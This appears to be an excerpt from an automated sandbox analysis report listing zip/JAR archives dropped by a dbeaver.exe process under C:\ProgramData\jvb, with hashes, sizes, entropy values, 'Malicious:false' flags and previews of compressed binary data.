      SHA-256:D0E3F655DAA4AE46DB047560E3C6244E3AF0D67C0FD1F295C05846F74A112EA8
      SHA-512:5E87C9757C9C6719BE570B3634C41CD9A8B20F7E14DF828DAD7CBD0CFE902A4A38C33B44C018E3B3FE88C5BFF4F9F7AA73D9528C5A5D5DD83C4055A6DF54AA1F
      Malicious:false
      Reputation:unknown
      Preview:PK........Q5.V................META-INF/MANIFEST.MF.V[s.H.~OU....}..pUDM....x...<l.0.D....~...=&..l.<...t..uO......0 ....yn. ...! .d.I.0..t..6l.A\(....".dz..|hP79;sM.2.7...x...-......Bn...FK... #...B.A~.Y...../...:...9.4.....Z.$4...M.....YB%V.y6.y..WJ<#H|...5=...^.L...z......T.......&....J.2]...].\..3k. E*.A...J......(.....oB...."]B.....60lh...w.7...C&O.j..K3}..x....B#..^.....~..Yb.,....._4Zw{.R.w...A[...k..k..R.,?....@B..."....b..._nL...g.....B..D./..H......b..G)..E.G..G..E.....`.....H...!}..Q.H'?.}/@.q...."..,....A......^.#d@.zh.S....?6..#$.9o..hu.]c:.{.S..U..1j..G...-.fT.v.K..^.i..........[.&.APt.q.uT\..&...4.14...F.{.....".5.Lh..x[.c0./.k...&.....pz..z!0.u...M...9...C...{Cf.9.L.H..}@.\...,......*S.L..<.wO.m...k(JU..r..K.P*....Y0xI,..z..k.j....*p...y.....:.J.....l..W3.....;.#J...Yt.../.~....UA.t{;..J..$.#W.B.8|......~......&Y'|D...VL..Q.5...'?.k...|..*Q........b......X+&.f.j..2.=.<.fs.K..P..g.T..J.j.I.{.F...o4H.Uj$..,7Z.?56.Z.....n...gN.fMC/..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):65979
      Entropy (8bit):7.912949239161832
      Encrypted:false
      SSDEEP:
      MD5:493D4CB09154D8A06E93B799DA8501A4
      SHA1:D857EBCA585F1E6BA066F16419E91E7D735E964B
      SHA-256:6D3BF754C5E99E90E41B13F557AA18DE11281CE2BC33D9E81BD92FA6C1FD12B7
      SHA-512:D34CEE2D6729D7741CE08BBC28BD3BC94677C4C94024B416ED969A6ADD2BC77D54E11C15343C9A31C8832D7B33179A3FE912BD5BA61DDBC270F1B24B47E8BE25
      Malicious:false
      Reputation:unknown
      Preview:PK.........4.V................META-INF/MANIFEST.MF.W.r...}OU..J...Vn*j*.^.E. K...j..V.M....MLL.^q..T.[k7.1..s.f.B...M.S...._.......r..*.A..R..[.C\.+..D'C.SV.}..M....B......R.n....|dO@.[..{.h.(Na.&...c%.*;.c..0M#.....!.0O.g..tA.O.g........N..=.....]-....<3.<....bE.J.p...E......`..#....Hr.#....I.....r.Pd.PX.. M?..........R<x.'.......{........bD.H[O.w...b.L..lR.0.RD"|...............1da....L^.\..?#Q.!.}.....}.K..e.w...C.n......L-.....H....n....aX.YH_.+..J.1L#..l...J.......c~..;..(|..../..z...9J...(..`...]K...I.z9P6...p.].aH7[...Z.".-!q.bY..fV..}A-......E.<.l...DS.........oeJ.....X....yr.Pk.P...%:.X.xW....\M...Z.+4.....k...W...d....Wk..../...#Z..w.].j.r.y.!.J.U.:-.S.....Q..).2.L7*...rspx..?.....K. $....;........0...mq.0.&......T.:g.mu..;|`E..lI...(.....gHF...\...5s...\..O.VuRpt.../}.r......Z...&.u.......Q4..y...t.s..{O_L.A...f..a.....F..5........:':o..D3.*....%.u.o.....>.......`+I+.5..1BT....b.L.O...........W.lP.GU..9D.I.o..q......^.....M.a.V../p_V...-P.:...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):141168
      Entropy (8bit):7.906834921491719
      Encrypted:false
      SSDEEP:
      MD5:BF662CFEC520C0D2936C5FFF9AE919C3
      SHA1:3215352B869859B86E4D9EE5A9366B5D52F53635
      SHA-256:B23E20AAF2DB5F841121A86CDDD08149D5DDA8F6D36EDA3FC052C22A22AC032A
      SHA-512:9104B31D218B74E1FE9DA6B5511DA06B07CEB2156FC9C46E2A0B742E53A4F10DCB1ACB1B662762A41773A06C1C0D759B3FF33EA57232EC5310DFF4D93EC7C7C7
      Malicious:false
      Reputation:unknown
      Preview:PK........kBVW................META-INF/MANIFEST.MF.ZY..J.}......>....@u...28...}..!.'.._.....T.V..|S..r..Vn.i.k.,..4s......_.0).r`...V..N..-Az7...../....{.....0.iD.[d..~.d..$..h.............d].z....8.....$.}p,.(>.....\3.\. .37...{.Fv......G..?m....Ga._.0:@`..G...j\d.i.+.K.../....n..gS..~.NI....f..}.... .........N.v.......Q."....+I..n.@zyT..82...}3..7...m-....."iw..M...8. .ZK-kA.`....=....8x.Zg.....yz...?a............+L..>..k......)........0....W>:.o.7h......}...._0....i}~.....c......}.../b...{Z......MK.v.Un.8......G.?.qi...ynnd..U.....Ad.nl......Y.,..Q.C[.IG.+.@.......&.......u+|...h.(....r.9.:K...S......'..S.,.. .f.s......."....7p,@.._.C~....l...=..~....b.3........_Y.r...........J'-u....R;.J.*Z....I.iT;../.k.....j.....]..../....L...............V}..,..p....\..Nc..&....SR6..0.n...n.G.y...k..8t..ak...f.g>.VZ..8.~....V..i........l7.p.<.. ....zW..'..O......{...o..=.>....\..|.[A.Zz.D$....U.7........>.4..)..4..(.....4..! .v../.<<j.G...}...{.[
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):376422
      Entropy (8bit):7.896690079039216
      Encrypted:false
      SSDEEP:
      MD5:0AA66741F74D07D32337D5483DD22110
      SHA1:526FCDE03A1489AF3741991A2DC187505EBD3040
      SHA-256:DE2405CCB6ED6B043352C5838EF515A30EB713813BD4D6DD825E4199F1392B5A
      SHA-512:24690BA93D948731E499BA1B39416E291593FAA1FA8506C9575F3D43ACED29CE08560538290D5703FBCC7D10DA10CCB036ABFD8AEDAA075BCD7451E72E097733
      Malicious:false
      Reputation:unknown
      Preview:PK..........bW................META-INF/MANIFEST.MF.}Ys...........aB......q...*$...a..$6..O?.vU..-.e.<..R...g..%S.[.Q...a.e..o........m..Oj..7....7......._V_......,.S.N..U......A......mJ..[..............w.)..,..G.u.%...j./.K.r.R._.u..u..E...<....>..%.._./=..K...?!.._.*....Q.}.......f..m.&z&...b...?5.?.........~ ....N......{Y.._...hn..._.M..2?...v..O....g..)....l.....~...u..n..u....^..g.i`X...oO..M.fY..Z.Lol....q....{..-.W...M._............*.m....S}'|.X9..._3o..Og.|..J..c.>.oO{..y.W.>.p..O...Ge.K8V.,..L3.....T2..m.w..'..r.&O~...2~}....Tn..D|..i...7..3=....>....q..*.o(....o..>..]...C....L...oN.....~E.g.J......k.....)5.nV.......#y...R.19..k.,.;|...}y...h....y._.......*s...>..;.c..W[...*r7.^...%vko..~9{..U...........W..G.3.3.8~..O...].<.{Z...}..^...................A..%...q...G..QMpz..>......to....y..y..z=.{.9..g.UA..J__.....t...r.....;......Q....9^}........g....>[.W..hi~..uH....A....e........wU........Y^...y%!....M<.u
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):79314
      Entropy (8bit):7.92726276687611
      Encrypted:false
      SSDEEP:
      MD5:566757576AF3E3E7D6F546CE518BED8C
      SHA1:29C7992D2F6278C4FBB00ECAA1E17C69145EA1A5
      SHA-256:85DAE3C6EB25DC2F5C398190890FA9F3B987448CAC250842E06ADEE47783FFA2
      SHA-512:2AC4DE282E548733CC2948FE9C24C9851ECFEC3846F1B94E7C8348FD8AE318ED9790960975592502F01E8D6D4F6F687E89213066779DBCEFA16F7E497E2F1DA8
      Malicious:false
      Reputation:unknown
      Preview:PK........8.eW................META-INF/MANIFEST.MF.XYs.Z.~OU.C*u.....`N............ne.I...F3x...~I...}.Z{Mdh...IZ..8.a..7.....f..:[.<....O......OD.......zN]vvu=.62........+.;d........"/[....D/}+..}>.....=.%.........a.b3E....k....g.g.8......F..Z..cT.......JK...../j..mz.x.zy:.}|..(..j.;s}E%.R.........Q&/?...........}...>_{..+.W......V.k`..Zu4...K...C.......w..7^.q6...4...|r.:Q.F....`g.:!.a..>..'..M]._$L.Na~rC.R..g......^.O.7.CaO...<....D.i.....>HM.L..B.g .oZ. .......!....U..U<.g;.\.....T.#...(.T.......%.DH_....#..s...../..!.b..T@....+....)..5...W....PD1H*......(.?.#.........<..B:..]..D5...fU....r...;.D..5l...}p...-...n..=..xwy.<5.n..>..v}.:....9BP???..a..@...A`...)...5L_6i.%/.&....]6_1..s..?"3..|>..y...Gj..>K..A...{.Que.J.O..1.t;.A.6..E...l.wi..`...t.v.....~S.|S.V.Hj....T.I..."..*.....v.-.]....r.#.......6,.x...3.[....E.n.9....*c.. IM.....D|.` .p...K....n..._-..l.58..ZP.t..[....V..\..$...O.D..;.....sI.v.....A.-..s;..%A.>p.k.c.....-...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):254288
      Entropy (8bit):7.954271177946098
      Encrypted:false
      SSDEEP:
      MD5:ABD3CBB3FDFE02ACD166FEE8738A3278
      SHA1:94768BFF9A5B73A828C6B54B23D1889E52D79E6E
      SHA-256:817C0A3B5F9C1B1D96C598F2DFD5501AEF735880C00267FB3B546E06362B6E5A
      SHA-512:7663692F6CF98A91BC6F4061A772AACF891C2EA9BF02FCFFD7E52FBF186C2A40B7684C27157649920C291C2E3A85A7CFFFD64B28066A25AC19C5BE9045D8140D
      Malicious:false
      Reputation:unknown
      Preview:PK........H.eW................META-INF/MANIFEST.MF.ZIs...wD.......\[h.....................]v....ml@yN~..S..}.-....~....?.....]P.....E....!s{..n..}.?...1...y.;....vK.w..N.>....,..G+.....z..}y}.6......".w....i.>.Y....1E.....b../...~......?..]....o$.="..c.........F..u.].5(......>.q..1._6n7{|].o..^R'A.....78b.c..4Oj.q.wr/........4.v~..P.d.].9.v.`...8r...9...<t..4..............Y'.........E....../.[%.%....1...D~.........^......dWhZNOd....6Qk" /}...c.I....I...Nr.q.i+.{t.....(.'.>/....i9]#{...6.L.;..s....^d.y....d.E.#.o.A....b.X.[...4w......g]..nE..vZ...].Un.\...>...._....S....../p..<......>:.ns....[.?JC.Nb..Uy....6.U.}...bA....b...HO.........k.v.;}.m\/..+..b..3..*..._^..[:.&.s.h.q..([N/...K%aK.v..[.....:...z..."'......m>}..y..V..v.0-..E/r..M.?i.=.W.=..6H>e..C.....q:.... ..-.......?=.,..T.|.0~.qZ.^'........8..V.v.MGP......;P.....wB..i...nZ&I.._V..~Z\....r._..r..j.kA..S.."x...e...[NH+pe..=.....{E......>.U.O.....]..QG.z{....T..g..O.o..o...R.><W.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):106246
      Entropy (8bit):7.925390008899918
      Encrypted:false
      SSDEEP:
      MD5:A898D2CE567E197470F501950AE647C6
      SHA1:64CDE2A9473419886F2FC7F550411A7EC9918662
      SHA-256:6C17519B417B2D7452BFC6DADC616B4F9B936C23BBBBECF7CA041A400697CE11
      SHA-512:2FA0CB80A7B70CDBE5C7F354FFD0B5C0B750D9B7FC672A4837873258B984295E8F36011D68A61FEEBEBD9610B8C30C370371A83C35512A029145DC9ABF2ACFE4
      Malicious:false
      Reputation:unknown
      Preview:PK.........06W................META-INF/MANIFEST.MF.Y[s...~_U.......\....U..... ..<..`@.*....3hb...$...0...7.....x..#.<.ad...#U&.~.B........$.{.Bmc%0|...bE3.......r.5lV+....|...<..O..../....o...9sU....?4.Ps. .e..-.O..].b.....E.g:.a.Q.....F.L....+d...i..N.8.Y.@~x>..!.z....|2..........X:.?e4.5.X9@.<.......O.?D.".l`^..l._...Z8d.......x.#....Qf{.4l.......MPx....\^.[.H..<..'..Md.+n..}}.....Sz-...~....z...........@+J$.R..$.0...X.o0.......\..=]@.e..~L..!|>...6.|..._G1yN.....?.2U/.?....P=..s:~dZ..T.......u>.Z\l..%V.{....c.$@.?(.4..b.aX4..g.?..v.. .u.A...~.0.C...~.,.....,......2p9.. i0..0*....(v....W.C..x.p.].Y..e.rd..s~.?F...P0.......]...'p~!.tfm...f.`....L.......8+d.......J.B..>.8]T..J....$...{qa............Ct...........9..0.>.Q.....r..f.?..6.P.............?.t.N..+^..+G0L,...z..>..]`"..a.q>...W...!.q.~h.\.=..V.......w.......g......tx..3........!...<F..bZ.e.P......... ^]>..$...x...........?.B...$.&K.N.....8.,$..H.Qj.Q5TH.:]e(..7..R4......x......@.. q.J.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):53423
      Entropy (8bit):7.94330079846056
      Encrypted:false
      SSDEEP:
      MD5:CE0C70A6F30561D90C523DE9643ECCDB
      SHA1:82D9E6891B2257E5CC2A68D3BE5D42799C8F3CE4
      SHA-256:939BCB86E29EA3DC96D8DCAC252214AB5B3A11B74D16D9FAC1FFCA2DD10D9FF2
      SHA-512:D5DD46BF5C881F8BB8E6565AEB8F177FA5C39DAB29DB5BF179AF955833D6BB5B6AEE6EEF6DF9C35DA9EA43BE1349255F5A309B43D68E97450EDDD8615476756F
      Malicious:false
      Reputation:unknown
      Preview:PK......../26W................META-INF/MANIFEST.MF.W.r.8..*.@...]<<1Ce.....y.[t.l.<.2......$y.....{t':....ij.H.=.......F..HOU..D......h.."........z../SC.A....R.W...rz...TJ....]...d.u4...`..S@..~...D..6....A..FD..c7,..5mD=..&Q..$z.<.)+(.$..IIKEEN).,..*......?...........>.......o.x+.#......w......y.......K`^..k..M..06{.....LP.px<....s.... .... ...WF...'...u.f..A.......d...`Hq...@...tze.?l...X.....u.KK..X..C.'..|/...r..wv..G......2.}/......@...$X......,H.c.yr...E...fI.5...(+G.. ".9.x3...'8..>.|4...p)...!..`...Z(...-z......_i......\Vc....GG!......,.y....SW......!...;...Bo=..O..3..`.$b...Q....!9....U.[......X..Ya.....X._..3G...q'.t..c.X....OV...aSh.ey...G..;..............no*.....Lu<=:....n6..f.......@.....D....i...K..>[......z.......>....a..y.)0..T....... Iwe>.1U..,.u...Z..14$...FF/fsHV$.d.......I.#S......e..JC.....).o..!k..+.A...>VRJ6..c..Wl3..yH...U...Y.2...|\l....d*A1..cS..*r=.P.#..9'.<_........\W..\`/L...~...K.)"%.7.4U.........u..yG.&w.S..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):265176
      Entropy (8bit):7.9514490084280105
      Encrypted:false
      SSDEEP:
      MD5:8A4FB3FEE8EEC4CB16F94008EE534368
      SHA1:E076DE2BAC9A8CC144E5738DCC81C63F3F081CBF
      SHA-256:251A4F67D6F2C2554699F154B109634436D6C7F6A06A7B1615600416677A4174
      SHA-512:1780D28B51A03A74C0000BCE7CDA287B57E205E1C78A1C4875D4C50CED6FC4A54FFE6F2DD0EDF51D3D209AC2EE555301F74AD2733B08FA44A6A61CF7701FCAA2
      Malicious:false
      Reputation:unknown
      Preview:PK.........BVW................META-INF/MANIFEST.MF.[...~OU..T.[..A.I*... (.(x.n1.2.,....)I..n.K*...\......w...Y.'.o......l.......7^....43=...o.!:..~..~h...NNm.....Vh...2.E._........._.?...O....yY.d..6C?..},.8i.)<..4..".N."I..g..nh..!..~.Vd.....!...............Y....z...v..._...{........^..,.|..~..\b.....[......B5i..w.n.t.......D....~6w...5?~....?...Y.d.F;A~'....i...t.I.....|.j.C.w...Hl'.v.......~...p....T.G.....C.*..d\..o.?.|.".{3..b..M.....%...E...' ...o.l...t..(.z.n..K.t...x.x,....>*..,.#;.~|c.J...gQ|...B......z{.....vU=M.>..Z{..:Y..u..t+..w...7:..Y.Krt..v.f.y.d.m<.<.e.....g....[..n.xE.Gih_....f..C.....yT'...fvg....l.r.t.:I.......oc..B..B.X....T..>|..z]tnm..U..G.....gg......W7...yi/.].g.>...{9..b....v..O...g......^p.>.5O.{...y...$........N.{...&...v.....+R.P....:..<.....t....o.t...'?......J.CB.M....;I.r6...zK.5......?I.$A3...-.d.u.)-...oZ......+N....=,L.o....%.s...E.u.....|d......,...23m.v.OG..o...p..W.i.....{..o.^..d.....?S..~}.T.
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):193243
      Entropy (8bit):7.895731914121207
      Encrypted:false
      SSDEEP:
      MD5:D8808D8EED26BB4069D5157199AB41D8
      SHA1:5D5CEF17F9063DAE9546F48A9D3F0D7A37CDCDA8
      SHA-256:2DC9088D7A237C5BA53FF96B81CA73DA57EFC610A9F2A8296CD4E0D76FE63C0D
      SHA-512:88E807682774DAF463F0D18ED328199C138F67850668E089FD43B4B5D93E70454E86CF5220ABB766DB1802D7BB10F7D37EC80D0EDCFC955CA85327808849632D
      Malicious:false
      Reputation:unknown
      Preview:PK.........YkW................META-INF/MANIFEST.MF.{Y..J..}G........A../P@PQ.d.8...$3...........2s.+..)o........ ..~..._..2.(......7*'.Ff..TN.mr.._.L. ..,...)u.n...-.C... .I$........'.K/.._.>...L.....d.c.A.;w...K...I.<(...'.b/t.N..EV>.y^.....U..........F.V.TF'...p..._.y.4..j.....4K..v.W{Z%...g......./t.&Y.C0......%...Q^8......fA.h..._..5.'#+.......6.T....C........).../.aYep.D.......v.^.H.0.......:I......`z....M..N7....zz...9,..8...}...:IC.z.L. ....;+...F;If........dW.7.5~..Y..N..+....?.....ddm..e..v.Iz..t./.}.....[....I.aqw..t'.97..t.e}............_P/..%o/.z...r....^O.g..i.R..........rj'...Y...{o.}../.~x....%o...s.$~s....H.....i..E.Oi.a%.n..... K......FeH....!.v..>cw.!4.../\.:......M...L..j-#/B.y....=..2.C.0..R....a^.....L....q}...2..54.s:IN..q....0.-.$rm.}PI..az......f.I.p.:....b%v.._..$.b.}...."....i.N...Nl..'{..|.e>.e.5..._.=f..B...2.....6(...e..X{..t|.0.'?.zV{'..]b.......9..b./.:I7..../..St..^....A...T:/
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):138779
      Entropy (8bit):7.914388172093898
      Encrypted:false
      SSDEEP:
      MD5:C7CC7A9DFF41ADD9F8E3D5D3ACA1AA3B
      SHA1:B7B26420CABDDA764C4D7547BBCD7A1FCE03F97C
      SHA-256:008D17745186D58E211BA0BBB78E44DDD64613EC37A184D9A44764BB8F367D0C
      SHA-512:A4514BD41F0A505DFB9970B95FD6475811EAA635271BCC8F28CEA408C2BF9AD5126C4638C733D4227C7F92680A5F3E24231EC69685AC6F6BDC1C06FD3487959B
      Malicious:false
      Reputation:unknown
      Preview:PK........`5.V................META-INF/MANIFEST.MF.ZIs.L.wD..G.7..^.6..>.!@........RZ.v...^....aS...Y......H...HR7....6.....-..}..p'j....p..$wx....o...w....bd........Y%........_...n.....r...w..(.....8.mp..0..1...p.....o..nh. ......~eI...e.6.F..]`..#=..G.H.y.cdn.eQry_..HB.......g.....F..$*\.$o.:...wk-;.;....W.Q....i...nc.Y4'.h.........?.{+q!....+.&..B..A.6.(v....f{...rPe l...9.3.W_Z..m7..b.2p:....S..f............Sz&..........]...<6.=.....Wx.@.?3.5=.ze..B.....A....CM..9. 9.~.....`....z...(...~v.g....(.F.!.Up...xv.G.&W.#o....Da....N..M.._E.....M,.......o|..j.d..h#-I!.7..Q..I.fn..q.,.....# .W..'......K[F......p...tN(..~.FZ....K.&.@.(I.....L7DO.q...~.?..L.B.L._....cGK..z....l-.!.F..'......4Sk.....M.l....R.F.......Q.6w...R....~Z..'M.n.0m..];.1^.......O6Lc....o...d...w{........h...P..(....wi#z.......Z..."n..J...#..Q.~Eqv..r.wS.).JAM..|......+.-..v/~.Q.=KBM...F...-.........K.45...g}D...5.\.wi.R... )\.....i..t/..S6...^...BM.uM..7.k.F.XSH\t.K..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):91132
      Entropy (8bit):7.905939315310424
      Encrypted:false
      SSDEEP:
      MD5:F1B8F82E41B22FC8C1A4DCF6AA0C6184
      SHA1:8B634594DFD91799998023FC561B27F1EC04C478
      SHA-256:DBE1C692471CB4D4C4F1BC03FADEB11454E9367DE8818E6D1755D5FF91BF2B85
      SHA-512:86FA1ACBEBCE13275D2D9174E7885B2C07D2EA1ED5E8BF0A50D348D581014E083BD370E4BAE30943C22BEF6C8F3C26B595E272CC76DC558ECD5980E3B8FBA35A
      Malicious:false
      Reputation:unknown
      Preview:PK........+7.V................META-INF/MANIFEST.MF.Y[s...~.............$5........p..FP..U....I..L.I...z}..K.k.Nu.`.4W0.....'Z..7..z..f.x.........N..{.E.+...M.<65.Ae...M.6......G.....?........D+<#p.p^.D.....b.a..A.B.V...F..'-_O*:.c..{.&......G..?!/\.Z....6.&q......XPA.I.]...F..^'.......[.f..'...1a...I.t.)+...9.w..9...9..Q....\..f..b........tP3..+.'....oj......4A.y..uk..G.6.i6.s.~|'Zd.....8p....P....a{.....<...........^.3].4/..9...y]YU).zY.}....h.D.eC.Ud/}.<....U>..........[x}...".7..~.......XUHW.[1r~k..Bj.<.......]..(.3...?Q.@....d......H.Q.;O'...cN...-=J..:&.D..{. .;..F..*.e.xy..z..U.....UOO....S../..H.U/{.s.........w..4.....40.W....W"v^..4.P.....`.p...a.$.v......vj.R.=c7......Z.......I/`.}....D.....z_!.%..W.R+...............$..NX......v..,.0.v..v.....N.r.R$m.6....}..*..I.........N.V2.BJ`..q..N.6&..E....X...;.....TA.~:.=;.=K3.....:...M..z..J,J..-=Lq.iW.5.:..z...!...z.....[.B.k.-..A,...GkE...2..i..b...cz.t.q[..+v.MT.=.%..>GK~z].<.i..4....2....|I/G...tvB.G.|..
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):49132
      Entropy (8bit):7.911464315428838
      Encrypted:false
      SSDEEP:
      MD5:0734327852D205EFCD6C438DA6970628
      SHA1:55DA78A554C53F41141AFAE9F6B2F1306979C088
      SHA-256:264494BE03360A107321E432388C88F7E9D37BF3C69AEC3E1864E96493CD4025
      SHA-512:D6809EE39FF03F1D21A3580DC0FB363A4FCEDD4E9B6F4B78B4375899377F1D4292C4301229DCCB50FC49F45F08FC1728F8C83E635D0E549E6255408D20136935
      Malicious:false
      Reputation:unknown
      Preview:PK........(7.V................META-INF/MANIFEST.MF..Ys.H...S..`..<9..{*..(j.....T...,.."....&zk*.7......Y0.J/.....B....:.....v.*( .~A$..%.....K.c.....T.....,)o6.&....x.U.+pc.....y:v.q...f.. ......)..LD....D..:.^.W.2.1....W..R....r......B#....'.`.~.*.A.4....&X:.}.1.G.d/9.}z......?.1...\..mA.E..p.....dB.X....W.kn?re`........I..G`.C.a.].t.Gw.k`......g....a=|.....|.w.$.2`......ER...4..X.....R.=.Y4"........A...K71.y.?[.`..9.4.....Ii.W......~...1-Y.A..[....B.(40MK.g6..:rQ....D=..p]H..f.7.\...U...36............x.....:<..`.x}..uq..H.R...Sq......./..K.<..i.G..t!Xe.^...{4...`3>o...G..DI.11...a....V!4.....6......6..ofKof..u...#.......!._...#`?=..{.Z*7..<.C....dA..0`..4t.,...l.......W`.t........9.wH...')-{&....e3.e..W..|..sF).o.yuA..y..._.....U.....B......X.#...].(.Lo.?.yi.~.......}.P.....A...AO..=>,..X5..ph.,Y9.A.....k...k...8.ghz...q.(<.*.-...q...K..j.s...@.q.l.k........Z...dX_T...d..p.H.....Aj..N.y+......ch...,..-[.qu..p...=x....l..z.m....E1.'..J
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):162314
      Entropy (8bit):7.912320497460683
      Encrypted:false
      SSDEEP:
      MD5:F2DD1C7CD8D98528D3B7705C89CE84F5
      SHA1:49B4FE089A8CE1637310B2EE2CEB787AFE6836DA
      SHA-256:95F9F84350110218B85A5E942757E0375BF7264207380F05FCFA764990E48AFB
      SHA-512:AB6D23731085525A47F78CE6E7C578711B30E4E5F9300F6D8BF0A8044A589535048E71A9ED370AAFFE9ABC9B705C13B2343892A7A7D445E8B488DEBCB89675E2
      Malicious:false
      Reputation:unknown
      Preview:PK........\..V................META-INF/MANIFEST.MF.ZWs.Z...L.C&.sq.m...Lf.*..$...|.{..j..?.v.g.ygL.+[.].z..he..U...+.(.~.......j..N_?.V.e.f..F.W~B...T.%......s.....M.;.I.H...d...O......zJ.<...W.2...$**..;6Q....|.D.nT9....... ..a..u....b+.=...-....C......27/..y.~~...+..V. .H. ..*.P...4.7...<K....I.ZKe..:yz..._7..w_6Y..._/.4.7.q..q/.?....?.n .............~j.B.3..~......D......_%.....$..%Q=...:.J...E}.....V.b.A./.]4.Z$. .ys...k.{.tTc.W[.U[.|6H..U...+.<......7d.^.WQ._3...'I.2.l...S...l_.e}'[...F.-.j....*.......x.b.*.1...I..n..B...I..w.z..'Y....w..<=.}w..>.j.~.......7. .H.,..o.....fM....;1w.gn.......;5oJ.S<.+....*'..D.....+.....}.8.$..I*0H.63......G....@..[m..?...........ZQ..a..."....Nb..{ dC..y.i.6.#.A|..........O........bwL.....WP~......F.)*....q.V".....T'...O..38&0X.2.~...O..Y.z.s0..]..d.......2..OW{.#......Q..B..~.......3..h".y]...WZn4.*..Z..w.AcU.k@./.]...bF5.|\..m.LG...u..ix`W-n..v>..<.0..2..v.h.......9..}.......u..m..[.2.....yV.y...
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):134724
      Entropy (8bit):7.9183300966340315
      Encrypted:false
      SSDEEP:
      MD5:493AE6CFE38871FA97D6DFAD7F940E4F
      SHA1:933F81BD335FE7957B2169DCA561627078F12656
      SHA-256:60AEE2CA41643EAE680AD98ECE6915A435D67D5472489058EC44549D64CD1DFA
      SHA-512:31D3E10EE776309B3716127BC03C9BC9BD8380D8108ADE87976D4EDCD78EE12C3C5B1A991ED1C7D041DA930D1DEDEB9D2619A462AD3F4573DBC63435A0574AEA
      Malicious:false
      Reputation:unknown
      Preview:PK.........eW................META-INF/MANIFEST.MF.ZYs...OU..+.~._.J...T.6I.@..B:..X.Eb........GI,..k..8........ZI..Xt...0M...........n.;..V..;6w..........\.FnGv..=.N..9..q#.Q.u>.$.^iV..../.J?L..Oo.Sl.Q.\$....'.3...P.IZw3.[..0.......0L...../...wy.M.?T...nE`...X.....J.q...)O.......l5..........G'.A7/."..g....X..E.o.K....T..b.....z...$...j.R.*..dcPX.UX?.!.mb/.[M.\.zi....n.....c8\..Ny./&U..I....N.*K.;W...0..y.z.wI..K.)......b..>~..R.Y...o. L..'Vt.k7.Y..".O.0.;=3....M.F.....l...\kl..V...y.V...q..5j...[.O......='..m..!.E...g.|."... .q0i3xS...g.t.%.O.5.&..t..+..m*....\.j..(..$..km..~.ot..LW...".,.x.../...,|..G._ix.!...y.}[.....t.W..:|.n..zL....!z].u.J..."|...l.......u....../.n8S...>......g.=.x.....H.NGM..;.......t.............A'....>(...h.....-....;.....[..U._>]..D_......|..[k...}..tk+.....08fS.${..x.g......=...X..3..x.?|.p...-....l....!....p.6{...".x.!.....Q&.F.i..U....._.il...8....k#...8..+w...zV.Z.v...g\~..Y....a#).1.L.Y.;f....9 Hc._..Oq]
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
      Size (bytes):82672
      Entropy (8bit):7.906400726130873
      Encrypted:false
      SSDEEP:
      MD5:DF200369F0C6309EE8BEAA2694564BBA
      SHA1:25742C1E4FED2857AE0C83C421A1532933C1D2D2
      SHA-256:774E255E73C46F528C02BD3976351B44EC67D4B1BDDD4748EA2F5C0C260F590F
      SHA-512:91D1F207E786E17398D5A291FC791DCC1D8BB580FAA321892A6F2F0172B5D8D05B4A676A839C24A71933CF17936C4C50D421D1FB9603B6BB5000A4B42C4170D3
      Malicious:false
      Reputation:unknown
      Preview:PK........WP5W................META-INF/MANIFEST.MF.XY....~......<.p.E......(..z.N.P,.Z,........7.*3.\.,E.8&...........F..u...4....A.....H.....z.Y..gTG.[.#.c1..-0<X..u..._.......k.o......s...Y5.{N....N....N-6...,.&X....o:..P..$Y.h...-...\.y....'.I...r....xo.k..3.7V.......~g70Je.G..c@...I...9...-.R.....<.QR.......<......P~..A3....nQ. X=...$u...f..~.r.....o.!.5...4H..~...g.U#.25.F....>KbMo...........d ..>v....>...4.....k..YO...Z.u....f.. ..O..s.....q.S...`.........XOR.}.,.9....Wi..{....P.@Op*C..q...F.^.k.(..\u... ..O.!...b.Wyq-]e.....]&.k.B...wbg$.$.I..n.BT.....`....aM.(.K..z7.l.k...y .p..U3.}Y.^....+.uNV-......u.al95\~..r.^n.NM.'.!D....)^n..z......c.....e...]\.a....a&...0..Q9.....R...1>.A.1u...F...n.G:)||...x=~.e..C..`|.9(.......2_-...&....U14.Wf.!..}>..a.t..&D0.........$.v.D.#A..v..c.x.W}.G`}.A|.).....y....m.yJ....Fh.:..I/g..;.`|.3..Y..(.i.6.F..(.h6L...4.&.r.......g.:.W...X..s,L..0Kf...........Zk8i..."kG..qu..8..~{.}x.x..e.`..!.3......P...)I..,
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
      Category:dropped
